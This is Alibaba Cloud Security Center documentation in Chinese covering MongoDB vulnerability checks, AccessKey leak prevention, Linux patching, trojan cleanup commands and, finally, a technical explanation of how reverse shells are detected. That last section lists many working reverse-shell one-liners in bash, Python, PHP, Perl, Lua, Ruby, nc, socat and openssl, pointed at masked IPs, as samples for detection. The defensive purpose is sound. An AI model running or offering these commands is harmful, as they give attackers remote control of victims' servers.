vsftpd服务器软件	 本地用户 打开配置文件vsftpd.conf。 增加或修改配置项 anonymous_enable 的值为NO。	无

6.MongoDB漏洞检测最佳实践

云安全中心应急漏洞已发布MongoDB未授权漏洞,该漏洞可直接被黑客远程利用,可能导致您的业务数据 被泄露或勒索。建议您立即进行漏洞检测并按照提供的修复建议尽快修复漏洞。

前提条件

- 用户已同意应急漏洞检测协议,授权云安全中心进行应急漏洞检测。如果您已完成授权,可忽略此信息。
- 安装云安全中心Agent后才能执行漏洞检测。有关如何安装云安全中心Agent,请参见安装Agent。

操作步骤

- 1. 登录云安全中心控制台。
- 2. 在左侧导航栏, 单击 安全防范 > 漏洞修复。切换到应急漏洞子页面。
- 3. 在应急漏洞页面,单击漏洞操作栏的立即检测,开始检测漏洞。

Linux软件漏洞 287	Windows系统漏洞 56	Web-CMS漏洞 1	应用漏洞 1	应急漏洞 7						
G								全部 >	查询漏洞名称	Q
漏洞名称						披露时间 и	最新扫描时间	风险数		操作
mongo-express远程命令拼	执行漏洞(CVE-2019-10758)【远程	問題構】				2020年1月3日 17:21:35	2020年1月9日 16:37:31	已检测,暂	6风险	立即检测
Harbor多个离危安全漏洞(CVE-2019-19029,CVE-2019-19026,CVE-2019-19023等)【版本检测】						2019年12月4日 16:59:31	2020年1月9日 16:37:32	已检测,智	E风险	立即检测
Apache Solr JMX配置默认	开启导致远程命令执行漏洞【远	程扫描】				2019年11月19日 17:11:03	2020年1月9日 16:37:32	已检测,智识	E风脸	立即检测

触发检测功能后检测引擎开始工作,该漏洞状态会转为**检测中**。需要等待一段时间才可完成漏洞检测, 请您耐心等待。

x软件漏洞 287	Windows系统漏洞 56	Web-CMS漏洞 1	应用漏洞 1	应急漏洞 7					
							全部 🗸 🗸	查询漏洞名和	Ŗ
同名称					按靈时间↓	最新扫描时间	风险数		
longoDB未授权弱口令い	词漏洞【远程扫描】				2019年3月24日 10:23:35		检测中	75%	

4. 查看是否有风险。

待检查完成后,可以在页面上直接看到检查结果。

有风险检测结果。

最新	fi	
~	【2019年3月24日 10:23:35】 MongoDB未授权漏洞	1 个资产急需修复 再次检测
	MongoDB数据库未授权弱口令访问漏洞,漏洞危害严重,可以导致数据库数据泄露或被删除韧索,从而造成严重的生产事故。	

• 无风险检测结果。

漏洞名称	披露时间 ♪	最新扫描时间	风险数	操作
MongoDB未授权弱口令访问漏洞【远程扫描】	2019年3月24日 10:23:35	2020年1月9日 16:37:32	已检测,暂无风险	立即检测

5. 查看结果详情。

最新	点击进入漏洞详情		
~	[2019年3月24日 10:23:35] MongoDB未授权漏洞	1 个资产急需修复	再次检测
	MongoDB数据库未授权弱口令访问漏洞,漏洞危害严重,可以导致数据库数据泄露或被删除勒索,从而造成严重的生产事故。		

MongoDB未授权漏洞 🔹 返回		漏洞基本信息 🔨	•				
基本信息							
标题: MongoDB未授权弱口令漏洞	CVSS:	分值: 无	CV	SS: 无			
披露时间: 2019-03-24 简介:	CVE IL	5: 无					
MongoDB数据库未授权弱口令访问漏洞,源	_{霸洞危害严重,} 可以导致数据库	数据泄露或被删除勒索,从而造	成严重的生产事故。				
详情:							
升启MongODB服务后、如小添加任何参数、 漏洞成因 安装完MongoDB服务后默认有一个admin委 数,如果没有在admin数据库中添加用户, 影响资产	默认是没有权限验证的。登录 数据库,此时admin数据库是空 此时不进行任何认证还是可以	的用户可以通过默认端口无需密的,没有记录任何权限相关的信做任何操作(不管是否以—auth	屿对数据库进行仕愿操作(包括4 息。当admin.system.users— 参数启动), 直到在admin.syst	1、删、改、童等高范动作),而且可以 个用户都没有时,即使MongoDB启动时 em。users中添加一个用户。加固的核机	远程访问 汤加了 3方案是	·auth参 实现只不	÷。 ▶ 有在
资产选择: 所有分组 ♦ 服务器IP或名称		服务器标签	搜索		$\stackrel{\wedge}{\sim}$	<u>.</u>	C
处理状态: 未处理 已处理							
必要性: 高 中 低			存在漏洞的服务	器列表			
□ 影响资产 修复必要	性 ❷ 状态(全部) ▼	说明 🛛	4	首次/最后发现时间	_		操作
	未修复	地址: proof: proof:	-> passwd_is_empty	2019-03-24 10:48:20 2019-03-24 10:48:20		验	证 忽略

6. 修复漏洞。

如果检测结果显示您的服务器存在风险,参见MongoDB漏洞修复方案进行修复。

7. 验证修复。

漏洞修复完成后,点击验证进行复查,确定漏洞是否已经修复成功。

□ 影响资产	修复必要性 🥑	状态(全部) ▼	说明 ❷	首次/最后发现时间	操作
 146 测试机 	高	未修复	地址: 27017 proof:	2019-03-24 10:48:20 2019-03-24 10:48:20	验证忽略

7.AK和账密防泄漏最佳实践

API凭证(即阿里云AccessKey)是用户访问内部资源最重要的身份凭证。用户调用API时的通信加密和身份 认证会使用API凭证(即基于非对称密钥算法的鉴权密钥对)。API凭证是云上用户调用云服务API、访问云上 资源的唯一身份凭证。

API凭证相当于登录密码,只是使用场景不同。前者用于程序方式调用云服务API,而后者用于登录控制台。

在阿里云,用户可以使用AccessKey(简称AK)构造一个API请求(或者使用云服务SDK)来操作资源。AccessKey包括AccessKey ID和AccessKey Secret。其中AccessKey ID用于标识用户,AccessKey Secret是用来验证用户身份合法性的密钥。AccessKey Secret必须保密。

创建 AccessKey		×
🕏 创建成功,请及时保存。		
AccessKey ID AccessKey Secret	LTAI! 59HI	
业 下載 CSV 文件 6 复制		关闭

⑦ 说明 API凭证泄露会导致数据泄露,从而给用户带来严重的损失。

云安全中心实现AK安全自动化检测闭环

云安全中心为了应对用户不慎泄漏AccessKey造成恶劣影响,设计了全方位检测理念,从泄漏前配置检查、 泄漏行为检测、黑客异常调用三点完成检测闭环,为用户的云上业务安全保驾护航。





阿里云已率先和最大的开源代码托管服务商Github合作,引入Token scan机制。

云安全中心AK检测流程完全自动化,可以对在Github上泄漏的AccessKey进行高效和精准地检测。在实际场 景中,阿里云已实现在含有AccessKey的代码提交到Github后数秒之内,就可以通知用户并且做出响应,尽 可能减少对用户产生的负面影响。

● 泄露前配置检测-云平台配置检查

在使用云产品的过程中为了防患于未然,您也可以在云安全中心控制台左侧导航栏,单击**安全防范 > 云** 平台配置检查,进入云平台配置检查页面检查您当前云产品的配置项是否存在安全风险。

云平台配置	中台配置检查 快速了解云平台配置检测能力 检测设置							
风险项 32 7	风脸数	未启用检查项 0	已启用检查项 48	最近检查时间 2019年12月31日 18:00:02	立即检查			
₹ c							全部云产品 > 全部风险 > 全部类型	➤ 清縮入检查项名称进行: Q
量差	线检查项		检查结果/影	明资产数	类型	最新检测时间		摄作
	平台·主账号双因赛认该	E	高风险		身份认证及权限	2019年12月31日 18:00:02		修复 验证 加白名单
C RE	OS-白名单配置		高风险 //	w.	网络访问控制	2019年12月31日 18:00:02		修复 验证 加白名单
🗆 SL	8-高危端口暴露		高风险		网络访问控制	2019年12月31日 18:00:02		修复 验证 加由名单
	盾-主机安全防护状态		高风险 /	=	基础安全防护	2019年12月31日 18:00:02		修复 验证 加由名单
OS	SS-Bucket权限设置		高风殿 /	a	数据安全	2019年12月31日 18:00:02		修复 验证 加白名单
M	ongoD8-白名单配置		高风殿 / 3	: Ø	网络访问控制	2019年12月31日 18:00:02		修复 验证 加白名单
Re	dis-白名单配置		高风脸 /		网络访问控制	2019年12月31日 18:00:02		修复 验证 加白名单
□ 48	作审计-日志配置		中风脸(Ø	日志审计	2019年12月31日 18:00:02		修复 验证 加白名单
R	X-数据库安全策略		中风脸(3 😵	数据安全	2019年12月31日 18:00:02		验证 加由名单
OS	SS-日志记录配置		中风脸 /	0 🛷	数据安全	2019年12月31日 18:00:02		修复 验证 加曲名单
	DS-开启数据库备份		中风脸 /:	*	数据安全	2019年12月31日 18:00:02		修复 验证 加曲名单
EC	S-密钥对登录		中风脸 /:	102 🔳	身份认证及权限	2019年12月31日 18:00:02		验证 加白名单

- 确保云产品的操作审计日志处于开启状态,可以帮助您分析是否有异常的调用行为。
- 确保使用的是RAM用户的AK,而不是主账号AK,并且遵守最小权限原则。这样AK发生泄漏问题不至于 失去整个云账号的控制权限。
- 确保开启主账号多因素认证(MFA)。开启多因素认证可明显降低因为密码泄漏导致的未授权访问。

● 用户泄露行为检测-AccessKey泄露检测

您可在云安全中心控制台左侧导航栏,单击**威胁检测 > AK泄露检测**,进入AccessKey泄露检测页面查 看AK泄漏的详情。

云安全中心 / AccessKey泄露检测					
AccessKey泄露检测 🛛 🖙 🖽	实时检测机制				Accessively Jupid Pilling
4 发现 2 个AccessKey泄露,可能会造成数据泄露风险,请	立即查看详情并做处理。				
AccessKey泄露 AccessKey异常调用告答	检测平台				
2 3	GitHub				
未处理 ✓ 谐输入AccessKey ID	Q				<u>≁</u> C
发现时间	受影响账户	泄露类型	AccessKey ID	状态	摄作
2020年3月3日 20:36:41	11111	AccessKey	1000000	未处理	处理 详情
2020年3月16日 19:21:26	1000	AccessKey		未处理	处理 详情

黑客异常调用检测-安全告警处理 > 云产品威胁检测

除了泄漏前的提前预防,在云安全中心控制台**安全告警处理**模块,您可以筛选并查看**云产品威胁检测**告 警类型。云安全中心会在发现疑似黑客异常AK调用行为时进行告警,及时提醒用户做出响应,做到泄漏后 及时检测。

补充安全建议

除了上述云安全中心提供的AK泄露检测和响应措施外,建议您在使用阿里云产品过程中遵循以下几点安全规 范,降低凭证泄漏造成的影响:

● 不要将AccessKey嵌入代码中

嵌入代码中的AK凭证容易被人忽视,经验丰富的开发者会将其写入数据库或者独立的文件中,使得其管理 起来更方便。

- 定期轮换AccessKey
 定期更新代码中存在的AccessKey,可保证一些旧的代码泄漏后不会影响当前线上业务。
- 定期吊销不需要的AccessKey
 在阿里云AccessKey控制台可查看最后一次AccessKey的访问时间,建议禁用所有不用的AccessKey。
- 遵循最小权限原则,使用RAM账户 根据不同业务需要授予不同子账户的读写权限,为不同业务分配不同子账户的AccessKey。
- 开启操作日志审计,并将其投递至OSS和SLS长期保存和审计 将操作日志存储至OSS,异常情况时可以起到固证的作用;操作日志投递至SLS,帮助您在日志数量大的 时候也能实现高效检索。

8.Linux软件漏洞修复最佳实践

云安全中心为您提供了通过Linux软件源安装软件的漏洞自动检测和修复能力闭环,并为您修复漏洞提供了更 全面的参考信息。

修复漏洞需要考虑的因素

● 安全需求:

在了解到漏洞带来的危害之后,您需要对资产进行补丁修复和加固,来满足您特定的安全需求。

● 稳定性:

修复漏洞可能会需要在您的资产上运行代码或命令,可能会涉及到正在运行的应用或者操作系统核心组件 的软件补丁,需要重启对应的应用或操作系统,这会对您的业务连续性造成一定的影响。对于生产环境, 或者其他高稳定性要求的环境,您需要充分利用各种信息形成综合决策,最终决定修复哪些漏洞及修复漏 洞的顺序。

云安全中心漏洞功能提供的信息

扫描漏洞

云安全中心支持扫描以下类型的漏洞:

- Linux软件漏洞
- Windows系统漏洞
- Web-CMS漏洞
- 应用漏洞
- 应急漏洞

云安全中心所有版本均支持漏洞扫描功能,包括免费版。如果您未购买云安全中心付费版,可使用免费版扫 描漏洞。更多信息,请参见云安全中心免费版简介。

在云安全中心控制台左侧导航栏,选择**安全防范 > 漏洞修复**,进入**漏洞修复**界面,默认会为您展示Linux软件 漏洞下所有未处理的软件漏洞,如下图所示。如果您需要查看已处理或某个风险等级的漏洞,可在搜索框中 选择对应搜索条件,单击搜索按钮。

Linux软件編詞 182 Windows系统编词 36 Web-CMS编词 9 应用编词 14 应急编词 3			
家会唱度 (変) (中) (低) > 是百己处理 未込理 > は減器 満辺坪 > 清峻、)漏別名称或CVE時号进行第 Q			ů ¥
□ 漏房公告 (公告内会包含同一软件多个漏同 CVE)	影响资产	最新扫描时间	操作
RHSA-20203952: expat 安全更新 🕑 148,200	59 66	2021年4月25日09:03:10	修复
□ RHSA-20204026: mariadb 安全和IBUG時間更新 (⑦ 146,500	59 66 1	2021年4月25日09:03:09	修复
RHSA-20205011: bind 安全和BUG修复更新 ② 134,000	59 67	2021年4月25日09:03:04	修复

如果您想要改变系统的**漏洞扫描等级**,可在**漏洞修复**页面右上角,单击**漏洞管理设置**,选择您需要的**漏洞** 扫描等级。您只有在此处勾选了相应等级,才能在漏洞修复页面查看相应等级的漏洞。例如您只勾选了漏 洞扫描等级中的高,在漏洞修复页面您只能查看漏洞等级为高的漏洞。

漏洞管理设置		×
Linux软件漏洞:	共229台 (还有60台未开启)	管理
Windows系统漏洞:	共229台 (还有245台未开启)	管理
Web-CMS漏洞:	共229台 (还有244台未开启)	管理
应急漏洞:	共229台 (还有20台未开启)	管理
应用漏洞:		
YUM/APT源配置:	优先使用阿里云源进行漏洞修复	
扫描方式:	全量规则扫描模式 > ?	
应急漏洞扫描周期:	毎隔―周 ∨ ?	
应用漏洞扫描周期:	每隔3天 🗸 ?	
失效漏洞自动删除:	30天 ~	
漏洞扫描等级:	✓ 高 □ 中 □ 低	

一个软件包漏洞在一定时期内的一批原因相似的漏洞,常常被发行版官方在同一个补丁中修复,大部分补丁 对应于一个固定的公告号码,在**漏洞修复**页面,您可以看到我们将这些漏洞以漏洞公告的维度进行了聚合展 示。

漏洞公告标题格式

红帽旗下系列发行版,如Redhat Enterprise Linux、CentOS的公告均以RHSA开头;Canonical旗下发行版,Ubuntu的公告以USN开头。公告中均会标识出漏洞涉及的软件名。其中红帽的公告中,也会显示一个重要等级,此为红帽为公告指定的等级,云安全中心在计算漏洞修复紧急度时也纳入了对这个因素的考虑。

漏洞公告标签

对每个漏洞公告中的漏洞的特点,我们进行了自动标记,并且将每个公告相关的漏洞的特征作为该公告的标 签展示在公告旁边。

RHSA-2018.0102-重要: bind 安全更新	2	2019年5月24日 12:54:19	修复
RHSA-2018.0151-重要: 内核 安全和BUG修复更新 (需要重信) (存在EXP) (本地提权)	2	2019年5月24日 12:54:19	修复
RHSA-2018.0395-重要:内核 安全和BUG修复更新 (需要重启) (本地提权) (代码执行)	2	2019年5月24日 12:54:19	修复

当前展示的标签总共有五种:需要重启、存在EXP、代码执行、本地提权、远程利用。

当您单击进入某一条漏洞公告后,可以看到如下界面。

RHSA-2020:4907: fr	RHSA-2020:4907: freetype 安全更新 ×						
漏洞详情 待处理漏洞							
漏洞编号	影响分 🚯	漏洞公告(公告内会包含同一软件	多个漏洞 CVE)				
CVE-2020-15999	6.5	FreeType缓冲区溢出漏洞					
紧急程度高中低	£	全部状态 💙 全部资产分组 🗸 🗸	全部VPC	✓ 请输入服务	S器IP或名称,进行	Q	Ŭ 🛓
「 緊急程度 () 身	最新/首次扫描时间	影响资产	漏洞 (cve)	关联进程	状态	操作	
	2021年4月25日08:26:46 2021年2月25日19:29:26	ce 007 47 143 公 172 28 私	CVE-2020-15999	Þ	未修复	修复 验证	2 洋情
□ <mark>高</mark> 22	2021年4月25日08:21:35 2021年2月25日19:29:25	ce 306 47 21 公 172 117 私	CVE-2020-15999	B	未修复	修复 验证	详情 :
	2021年4月25日08:21:29 2021年2月25日19:30:15	ce 2 11 107 公 172 109 私	CVE-2020-15999	Ø	未修复	修复 验证	│详情│ः

查看漏洞公告涉及的CVE信息

关注漏洞细节的用户可以通过单击具体CVE名称(上图①位置)查看CVE的技术详情。

查看漏洞详情

您可以通过在漏洞操作列单击详情(上图②位置)查看该漏洞为什么会被检测到。

查看漏洞关联进程

单击**关联进程**操作栏下的三角形图标(上图③位置)。您可以查看该漏洞涉及的软件包是否已经被您机器上 所运行的进程加载,以及对应的加载关系。

- 三角形图标呈灰色: 代表该漏洞涉及的软件没有被任何进程加载。
- 三角形图标呈蓝色: 您可以单击该图标查看进程加载关系。

RHSA-2017:2563-Moderate: openssh security update				
影响资产: cento: 公司 私 影响进程数: 1 最后更新时间: 2019年12月31日 04:20:41 周年				
RHSA-2017:2563 ID: 1369				

漏洞修复

在云安全中心控制台漏洞详情页,对漏洞进行处理。支持批量修复漏洞。

仅高级版、企业版和旗舰版支持漏洞修复功能。免费版用户可以申请旗舰版7天免费试用,使用漏洞修复功能。试用申请成功后,7天内您可以在云安全中心控制台修复漏洞,超过7天后,将无法使用漏洞修复功能。 申请试用的具体操作,请参见开通免费试用。免费版用户需满足以下条件才能申请免费试用。

• 云安全中心免费版用户。

未购买过云安全中心付费版服务(包括防病毒版、高级版、企业版和旗舰版)的阿里云账号默认为云安全 中心免费版用户。免费版无需开通,默认所有阿里云账号都可以直接使用云安全中心的免费版。

⑦ 说明 如果您之前购买过付费版服务,但是服务到期后未续费,您的付费版将自动变成免费版。由于您已购买过云安全中心服务,此种情况下,您无法开通免费试用。

• 未参加过云安全中心7天免费试用活动。

• 至少有一台阿里云ECS服务器。

RHSA-2020:4907: fr	reetype 安全更新						×
漏洞详情 待处理漏洞							
漏洞编号	影响分 🕄	漏洞公告(公告内会包含同一款)	件多个漏洞 CVE)				
CVE-2020-15999	6.5	FreeType缓冲区溢出漏洞					
緊急程度高中(氏 ~ 未处理 ~	全部状态 🗸 全部资产分组 🚿	全部VPC	✓ 请输入服	务器IP或名称,进行	Q	Č ¥
□ 紧急程度 🕤	最新/首次扫描时间	影响资产	漏洞 (cve)	关联进程	状态	操作	
高	2021年4月25日08:26:46 2021年2月25日19:29:26	ce 307 47 243 公 172 28 私	CVE-2020-15999	Þ	未修复	修复	验证 详情 :
高	2021年4月25日08:21:35 2021年2月25日19:29:25	ce 006 47 21 公 172 117 私	CVE-2020-15999	8	未修复	修复	验证 详情 :
高	2021年4月25日08:21:29 2021年2月25日19:30:15	ce 12 11 107 公 172 109 私	CVE-2020-15999	Ø	未修复	修复	验证 详情 :

后续操作

漏洞修复完成后需要进行验证,才能显示该漏洞已修复成功。

对于内核一类的Linux漏洞,漏洞修复完成后,还需根据提示对系统进行重启。重启后漏洞修复才会生效。

9.Linux系统木马查杀

本文档介绍了Linux系统查杀木马的最佳实践。

背景信息

系统安全存在漏洞或未采取足够的安全加固措施时,Linux系统可能会被植入木马程序。及时清理木马程序 后,还需提高安全意识,从安全补丁加固、系统权限加固、操作审计、日志分析等多维度对系统安全进行全 方位提升。

步骤一:使用云安全中心查杀木马程序

- 1. 使用云安全中心安全告警处理,及时清理木马威胁。详细内容请参见查看和处理告警事件。
- 2. 及时修复系统漏洞,加固系统安全。详细内容请参见Linux软件漏洞。

步骤二:查找详细的入侵痕迹

- 执行 last, lastlog 命令, 查看最近登录的账户和登录时间, 锁定异常账户。
- 执行 grep -i Accepted /var/log/secure 命令, 查看远程登录成功的Ⅳ地址。
- 执行以下命令,查找计划任务。

/var/spool/cron/ /etc/cron.hourly /etc/crontab

- 执行 find / -ctime 1 通过文件状态最后修改时间来查找木马文件。
- 检查/etc/passwo和/etc/shadow文件,确认是否有可疑用户。
- 检查临时目录/tmp、/vat/tmp、/dev/shm下的文件,这些目录权限是1777,容易被上传木马文件。
- 查看端口对外的服务日志是否存在异常,例如: tomcat、nginx。
- 执行 service --status-all | grep running , 查看当前运行的服务中是否存在异常。
- 执行 chkconfig --list | grep :on , 查看自启动的服务中是否存在异常。
- 执行 ls -lt /etc/init.d/ | head , 查看是否有异常启动脚本。

步骤三:使用常用木马查杀命令

命令	功能
ps, top	查看运行的进程和进程系统资源占用情况,查找异常进程。
pstree	以树状图的形式显示进程间的关系。
lsof	查看进程打开的文件、文件或目录被哪个进程占用、打开某个端口的进程、系 统所有打开的端口等信息。
netstat	查看系统监听的所有端口、网络连接情况,查找连接数过多的IP地址等信息。
iftop	监控TCP连接实时网络流量,可分别分析出入流量并进行排序,查找出流量异 常的IP地址。
nethogs	监控每个进程使用的网络流量,并从高到低排序,方便查找出流量异常的进 程。

命令	功能
strace	追踪一个进程执行的系统调用,分析木马进程的运行情况。
strings	输出文件中可打印的字符串,可用来分析木马程序。

10.云安全中心反弹Shell多维检测技 术详解

反弹Shell是黑客控制受害服务器的一种攻击手段,常用于受害服务器位于内网、受限于防火墙策略等无法使用正向连接的入侵场景。本文介绍反弹Shell攻击的现状、常规解决方法、分类与检测思想以及云安全中心针对反弹Shell提供的多维检测技术。

背景信息

反弹Shell是黑客(即Shell攻击者)用于控制受害服务器的一种手段。Shell攻击者指定服务端,并将需要受 害服务器执行的命令(标准输入、标准输出、标准错误等)重定向到该服务端。受害服务器主动连接攻击者 的服务端程序,攻击者的服务端通过监听来自受害服务器的请求,对目标服务器下发指令并获取执行结果, 以达到攻击者可以控制受害服务器的目的。

反弹Shell攻击现状

阿里云云安全中心通过分析历史中云上环境的Linux服务器入侵事件,总结出了攻击链路中实现反弹Shell的 语言及工具使用率,详情如下图所示。



其中交互式 Bash + /dev/tcp 是使用最多的反弹Shell, /dev/tcp 作为 Bash 的默认特性使得该反弹 方式兼容绝大多数环境,因此使用率高。紧随其后的是兼容性较好且灵活易用的Python。随着Go语言的兴起,云上入侵事件开始出现Go反弹Shell。从上图可以看出弹Shell实现的方式灵活多样,每种语言都可以进一步延伸和扩展。因此,为了保障最优的检出效果,反弹Shell的检测方案需要综合考虑多种场景因素。

常规检测方法

常见的检测方案是通过正则匹配的方式,提取反弹Shell命令的特征去匹配命令日志、流量日志。该方案具有以下不足:

- 命令日志采集不完整:例如通过Netlink等方式采集的日志,在碰到管道符、重定向时会无法采集完整的 原始执行命令。而通过Patch Bash的方式记录命令日志,在遇到服务器使用Zsh、Ksh等其他Shell环境, 或攻击者上传自己编译的Bash时会失效。
- 正则匹配无法覆盖无穷无尽的文本对抗: 攻击者可以不断挖掘出新的变形方式来绕过正则匹配。在实际 业务场景中, 过多复杂的正则匹配会带来更大性能压力, 而通配性更广的正则匹配会带来更多误报。
- 特征匹配失效: 在网络流量被加密后, 特征匹配会失效。

分类检测思想

因为表层对抗是无穷无尽的,检测需要由表及里,尽可能挖掘出更本质的解决方法。从检测的角度来看,反 弹Shell的本质可以理解为:网络通信+命令执行+重定向方式。

命令执行和网络通信借助重定向,可以构建出一条流动的数据通道。攻击者可以利用这条通道下发指令控制 受害服务器。不同的实现方式组合在一起,就形成了多种多样的反弹Shell。例如:

- 网络通信可以使用TCP、UDP、ICMP等协议,TCP协议再细分又可以包含HTTP、HTTPS协议等,UDP包含 DNS等。
- 命令执行可以通过调用Shell解释器、Glibc库、Syscall等方式实现。
- 重定向可以通过管道、成对的伪终端、内存文件等实现。

从检测的角度,可以将反弹Shell分为以下三种类型:

 第一类反弹Shell:直接重定向Shell的输入输出到Socket 该类型反弹Shell最典型的例子是:

bash -i >& /dev/tcp/10.10.XX.XX/666 0>&1

以下介绍直接重定向Shell解释器的输入输出到Socket类型的常见案例。

○ 案例一:

bash -i >& /dev/tcp/10.10.XX.XX/6060 0>&1

• 案例二:

```
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.XX.XX",6060));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'
```

。 案例三:

php -r '\$sock=fsockopen("10.10.XX.XX",6060);exec("/bin/sh -i <&3 >&3 2>&3");'

○ 案例四:

```
perl -e 'use
Socket;$i="10.10.XX.XX";$p=6060;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");};'
```

○ 案例五:

```
lua -e
"require('socket');require('os');t=socket.tcp();t:connect('10.10.XX.XX','6060');os.exec
ute('/bin/sh -i <&3 >&3 2>&3');"
```

该类型反弹Shell通过重定向 bash -i 的标准输入、标准输出、标准错误到 /dev/tcp Socket 进行网络通信。下图可以帮助您理解重定向过程。



这类反弹Shell的检测可以通过检测Shell的标准输入、标注输出是否被重定向到Socket或检测一些简单的 主机网络日志特征来实现。

```
[root@yundun ~]# ps afx | grep bash | grep -v "grep" | grep
4693 pts/2 Ss
                    0:00
                              \  -bash
                                 ∖_ bash -i
            S+
4709 pts/2
                    0:00
                              1
[root@yundun ~]# ls -la /proc/4709/fd
总用量 0
dr-x-----2 root root 0 1月 24 01:25.
dr-xr-xr-x 9 root root 0 1月 24 01:25 ...
lrwx----- 1 root root 64 1月 24 01:25 0 -> socket:[9325411]
lrwx----- 1 root root 64 1月 24 01:25 1 -> socket:[9325411]
lrwx----- 1 root root 64 1月 24 01:25 2 -> socket:[9325411]
lrwx----- 1 root root 64 1月 24 01:25 255 -> /dev/tty
[root@yundun ~]#
```

云安全中心已支持检测此类型的反弹Shell,下图是检测出该类型反弹Shell后产生的告警。



第二类反弹Shell:通过管道、伪终端等中转,再重定向Shell的输入输出到中转
 此类反弹Shell借助管道、伪终端等进行中转,例如下面这个典型案例将 sh -i 的标准输入、标准输出、标准错误重定向到命名管道 /tmp/f ,同时加密通信数据也流向该命名管道。

mkfifo /tmp/f; /bin/sh -i < /tmp/f 2>&1 | openssl s_client -quiet -connect 0.0.XX.XX:666
> /tmp/f

通过管道、伪终端等作为中转体,并与Socket打通,重定向Shell解释器的输入输出到中转体,有以下常见案例:

○ 案例一:

nc 10.10.XX.XX 6060|/bin/sh|nc 10.10.XX.XX 5050 nc -e /bin/bash 10.10.XX.XX 6060 nc -c bash 10.10.XX.XX 6060 socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.XX. XX:6060

○ 案例二:

mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.XX.XX 6060>/tmp/f

• 案例三:

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.10.XX.XX: 6060 > /tmp/s; rm /tmp/s

○ 案例四:

mknod backpipe p; nc 10.10.XX.XX 6060 0<backpipe | /bin/bash 1>backpipe 2>backpipe

∘ 案例五:

bash -c 'exec 5<>/dev/tcp/10.10.XX.XX/6060;cat <&5|while read line;do \$line >&5 2>&1;do
ne'

。 案例六:

telnet 10.10.10.10 6060 | /bin/bash | telnet 10.10.XX.XX 5050

在某些变形的场景下,可能经过层层中转,但无论经过几层最终都会形成一条流动的数据通道。通过跟踪 FD (文件描述符File Descript or)和进程的关系可以检测该数据通道。



云安全中心已支持检测通过管道中转的反弹Shell,下图是检测出该类型反弹Shell后产生的告警。

进程异常行为-反弹Shell 待处理	备注 处理
该告警由如下引擎检测发现: 🐼 🛷 🎯 😋	
目的IP:	
目的端口:	
可疑进程(进程号 进程路径 命令行):	
5720 /usr/bin/bash /bin/sh -i	
5721 /usr/bin/openssl openssl s_client -quiet -connect	
事件说明: 云安全中心检测到您的服务器被执行了反弹Shell命令,攻击者通过该方式与自己的服务器建立了反向网络 连接可以执行任意命令。	§连接,通过该

此类反弹Shell使用频率较高,其中利用伪终端中转的方式值得单独讨论,比如以下案例。

```
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.1
68.XX.XX",10006));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);impo
rt pty; pty.spawn("/bin/bash")'
```

通过伪终端中转与通过管道等中转原理一样,但通过伪终端中转的检测难度大大提升,单从Shell的标准输入输出来看,和正常打开的终端没有什么区别。此外,一些场景如容器、各类产品Agent等也会有相似的日志记录,平衡漏报与误报的难度上大大提升。因此我们在文件描述符合检测方案的基础上,结合进程、网络等多种日志信息综合分析。以下是云安全中心检测出的利用伪终端中转方式的告警。

进程异常行为-反弹Shell <mark>待处理</mark>	备注 处理
该告警由如下引擎检测发现: 🐼 🐼 🚱	
父进程文件路径:/usr/bin/bash	
父进程ID: 5541	
进程路径: /usr/bin/python2.7	
进程ID: 5776	
命令行: python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s ,;jos.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash"}	.connecti .
用户名: root	
进程链:	
-[2846] /usr/sbin/sshd -D -[5539] sshd: root@pts/1,pts/2,pts/3 -[5541] -bash	
事件说明: 云安全中心检测到您的服务器被执行了反弹Shell命令,攻击者通过该方式与自己的服务器建立了反向际 连接可以执行任意命令。	网络连接,通过该

第三类反弹Shell:编程语言实现标准输入中转,重定向命令执行的输入到中转 第三种类型反弹Shell通过编程语言实现标准输入的中转,然后重定向命令执行的输入到中转,标准输出和

第二种突至及弹动间通过编程信言实现标准输入的中转,然后重定问命专执打的输入到中转,标准输出和 标准错误中转形式不限制。以下是该类型反弹Shell的典型示例:

python - c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('0.0.0.0',666
))\nwhile 1: proc = subprocess.Popen(s.recv(1024), stdout=subprocess.PIPE, stderr=subpro
cess.PIPE,Shell=True);s.send(proc.stdout.read()+proc.stderr.read())\")"

Shell攻击者使用编程语言实现标准输入中转,重定向命令执行的输入到中转,有如下常见案例:

○ 案例一:

python -c "exec(\"import socket, subprocess;s = socket.socket();s.connect(('10.10.XX.XX ',6060))\nwhile 1: proc = subprocess.Popen(s.recv(1024), Shell=True, stdout=subprocess .PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.st derr.read())\")"

○ 案例二:

```
lua5.1 -e 'local host, port = "10.10.XX.XX", 6060 local socket = require("socket") loca
l tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do lo
cal cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read(
"*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
```

。 案例三:

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.10.XX.XX","6060");while(cmd=c.gets); I0.popen(cmd,"r"){|i0|c.print i0.read}end' 在这种场景下,反弹Shell的命令执行和正常业务行为变得更加难以区分,对抗程度上升,除了从进程命令 行尽可能的覆盖这类反弹Shell的特征以外,云安全中心通过异常命令行为序列、异常Shell启动模型检测 该类反弹Shell。

